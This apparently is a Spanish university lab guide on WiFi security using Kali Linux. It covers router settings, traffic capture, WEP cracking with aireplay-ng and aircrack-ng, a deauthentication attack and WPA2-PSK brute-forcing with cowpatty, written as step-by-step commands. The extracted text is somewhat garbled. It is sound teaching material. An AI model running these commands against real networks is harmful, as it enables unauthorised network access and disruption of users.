Guia Laboratorio Seguridad Wifi
-
Upload
marcelo-marin-soto -
Category
Documents
-
view
47 -
download
2
description
Transcript of Guia Laboratorio Seguridad Wifi
-
*Actividad Previa: Preparacin de Notebook con KaliObjetivo: Preparar un equipo Laptop para iniciar con un sistema con Kali. Este sistema contiene las herramientas necesarias para este laboratorio.
Preparacin de Pendrive para arranque con Kali.Indicaciones para hacer fuera del laboratorio:
1. Bajar la ltima versin de la iso de Kali que se puede obtener desde el sitio https :// www . kali . org / downloads.
2. En un equipo linux usar el siguiente comando para transferir la imagen hacia el pendrive. (El pendrive debe tener al menos un 25% mas de capacidad de la imagen ISO, demora de 20 a 30 minutos)
dd if=kali.iso of=/dev/sdb 3. Una vez que haya terminado el comando anterior, el pendrive est
listo para operar como disco de arranque para un equipo.
Arranque de equipos con Sistema Kali.Repartidos en la sala se dispondrn de algunos Laptops y pendrives los cuales servirn para iniciar el sistema con Kali, para esto se deben seguir los siguientes pasos:
1. Con el Laptop apagado, conectar el Pendrive en una puerta USB disponible.
2. En el caso de utilizar el laptop Dell, encenderlo y enseguida presione la techa F12.
3. En el men, seleccionar la opcin: USB Storage Device.4. Enseguida aparecer un nuevo men. En ste seleccionar la primera
opcin: Live (amd64)
-
Nota: Si es ms cmodo para el usuario, se puede cambiar el idioma de teclado de la siguiente forma:
1. -Seleccionar en la esquina superior izquierda Applications->System Tools->Preferences->System Settings.
2. -Seleccionar Region and Language y luego layouts, agregar el teclado Spanish (Latin American).
3. -Ahora en la esquina superior derecha saldr una cono de seleccin de idioma (es y en).
Conexin a la Red WiFi del Laboratorio y obtencin de los archivos para el laboratorio.
1. Con el mouse, situarse encima del cono de red de la parte superior derecha de la pantalla y elegir la red adecuada.
2. Abrir el Navegador de Kali, llamado Iceweasel. Se puede encontrar en Applcations->Internet->Iceweasel Web Browser.
3. Bajar el archivo labwifi.tgz de la siguiente ubicacin http :// www . cec . uchile . cl /~ hveliz / labwifi . tgz . Grabar con la opcinSave File .
4. Abrir una ventana de terminal y descomprimir el archivo obtenido.
root@kali:~# tar zxfv Downloads/labwifi.tgz
-
5. Se crear un directorio llamado labwifi en el directorio raiz de usuario root.
Actividad 1: Configuracin de router Inalmbrico.
Objetivo: Familiarizarse con los parmetros configuracin y revisar las posibilidades de seguridad que se encuentran en un equipo tpico.
Herramientas:Browser Iceweasel, router Linksys WRT54G.
Configuracin APs Configuracin router WRT54G v8.2.05
1. Abra su navegador y cargue la pgina que se encuentra en el archivo "/root/labwifi/8.2.05/index.html".
-
2. Realice la siguientes opciones para navegar por la aplicacin de configuracin del router.
a. Setup-> Basic Setup: Local IP Address y configuracin DHCP b. Wireless -> Basic Wireless Settings: Definir SSID, puede ocultarse
el broadcastc. Wireless -> Wireless security: configuracin de seguridadd. Wireless -> Wireless MAC Filtere. Wireless -> Advanced Wireless Setting
Configuracin centralizada de Antenas InalmbricasSsssssss
ireless Wireless MAC Filter MAC Filter
-
Actividad 2: Captura de trfico con interfaz inalmbrica con tcpdump y Wireshark
Objetivo: Observar el comportamiento y capacidades de herramientas de captura no especializadas desde una interfaz inalmbrica.
Ejercicio 2.1: Utilizar tcpdump para aplicar en interfaz WiFi
1. En una ventana de terminal de Kali utilizar el tcpdump sobre la intefaz WiFi del laptop. Cuando se haya capturado el suficiente trfico, detenerel comando con Ctrl-C
root@kali:~# tcpdump -n -i wlan0
2. Ahora en realizar la captura de la interfaz de monitoreo. Para esto primero se debe levantar este tipo de interfaz con el siguiente comando:
root@kali:~# airmon-zc start wlan0
Con esto se crea la interfaz wlan0mon para empezar la captura, se puede revisar el listado de interfaces con la opcin -D de tcpdump.
root@kali:~# tcpdump -Droot@kali:~# tcpdump -n -i wlan0mon
Ahora con ms opciones:root@kalil:~# tcpdump -n -i wlan0mon -e -vvv -A
Qu filtros se pueden realizar con tcpdump?
Ejercicio 2.2: Utilizar WireShark en la interfaz de monitoreo.
1. En un terminal de Kali, ejecutar la aplicacin Wireshark:
root@kali:~# wireshark
2. Seleccionar la interfaz de monitoreo para iniciar la captura. 3. Realizar el filtro para capturar la KEY de WEP (wlan.wep.key)
-
4. Realizar filtro para captura de Vectores de Iniciacin de WEP.
-
Actividad 3: Monitoreo y captura especializada de redes WiFi.
Objetivo: Familiarizarse con herramientas especializadas en monitorear redes inalmbricas.
Herramienta: kismet
Ejercicio 3.1:1. Ejecutar kismet-server desde una ventana terminal.
root@kali:~# kismet-server -c wlan0mon
2. Desde una nueva ventana de terminal, abrir ahora el kismet cliente.root@kali:~# kismet
-
3. Con ayuda del mouse seleccionar las opciones siguientes:a. Kismet->Preferences->Network Columns . Habilitar que se
muestre el BSSID y el nmero de clientes .b. Kismet->Preferences->Network Clients . Habilitar que se muestre
el nivel de seal del cliente y el nmero de paquetes de datos transferidos.
c. Sort->Channeld. Windows->Channel Details
Ejercicio 3.2:1. Cerrar la aplicacin y revisar trfico capturado por kismet con la
aplicacin tcpdump.root@kali:~# tcpdump -n -r Kismet-.pcapdump
-
Actividad 4: Intromisin a red WiFi.
Objetivo: Conocer formas de realizar captura de trfico y penetracin en redes inalmbricas que poseen debilidades de configuracin.
Herramientas: airmon-zc, airodump-ng, aireplay-ng.
Descripcin Herramientas:
airmon-zc : Se utiliza para operar la interfaz en modo monitoreo e inyeccin de trfico.
airodump-ng: Se utiliza para capturar trfico sobre una interface WiFi. aireplay-ng: Es una herramienta que inyecta trfico sobre la interface
WiFi, este comando funciona en forma correcta solo con algunos drivers de tarjetas.
wep_crack: Comando para obtener llave WEP usando fuerza bruta aircrack-ng: Comando para obtener llave WEP usando fuerza bruta.
Puede usar multiprocesadores (puede no funcionar en cisco) Otros programas: wepattack (usa diccionario)
Ejemplos:
wep_crack -b
root@kali:~# cd labwif root@kali:~# tcpdump -xvvvnnn -s 1500 -r nd2.dump root@kali:~# ./wep_crack -b nd2.dump
aircrack-ng
root@kali:~# aircrack-ng aircrack.dump
Ejercicio 4.1:
Actividad Previa: - Revisar si existe la interfaz de monitoreo wlan0mon. En caso negativo, iniciar el modo monitor de la interface wifi0 root@kali:~# airmon-zc start wlan0
-
-Utilizar airodump para ver redes al alcance. Ejecutar
root@kali:~# airodump-ng wlan0mon
Ejercicio 4.2:
- Obtener la clave WEP de la red con SSID "lab-redes". - Revisar ejercicio anterior para ver el canal y BSSID (mac-address del ssid objetivo). - Abrir un terminal para dejar ejecutando la captura de trfico del ssid objetivo. Ejecutar:
root@kali:~# airodump -c 3 -w lab --bssid 00:16:B6:14:71:F5 wlan0mon
- Abrir otro terminal para emular una autenticacin al SSID lab. Ejecutar: root@kali:~# aireplay-ng -1 0 -a 00:16:B6:14:71:F5 -h wlan0mon
-
- Una vez finalizado el comando anterior, inyectar ARP-request a el SSID lab. Ejecutar:
root@kali:~# aireplay-ng -3 -b 00:16:B6:14:71:F5 -h wlan0mon
- Observar el aumento de la columna #Data, se debe esperar un nmero alto para poder terminar la captura.Se recomienda capturar ms de 15.000 paquetes. - Obtener la clave WEP del ejercicio.
root@kali:~# aircrack-ng lab.cap
-
Actividad 5: Deauth attack
Objetivo: Conocer herramientas para desautenticar un usuario de la red inalmbrica
Herramienta: aireplay-ng root@kali:~# aireplay-ng -0 3 -c MAC_CLIENT -a MAC_AP wlan0mon
-
Actividad 6: Cracking de WPA-PSK y WPA2-PSK
Objetivo: Familiarizarse con herramienta de fuerza bruta para el cracking depassword.
Herramienta: cowpatty
Ejercicio 1: Utilizar archivo de captura de trfico de ejemplo. Nombre de la red SANS
root@kali:~# cd labwif
root@kali:~# cowpatty -r lab10capture1.dump -f words -s SANS
Ejercicio 2: Generar captura en vivo de una red activa en el laboratorio con WPA2. Por ejemplo puede ser cualquier red con WPA2 personal compartida por un telefono celular.
root@kali:~# airodump-ng -c -w --bssid wlan0mon
-
Luego de capturado el Handshake WPA2, utilizar el comando cowpatty y esperar la obtencin de la frase.
root@kali:~# cowpatty -r -f words -s
*Actividad Previa: Preparacin de Notebook con KaliActividad 1: Configuracin de router Inalmbrico.Actividad 3: Monitoreo y captura especializada de redes WiFi.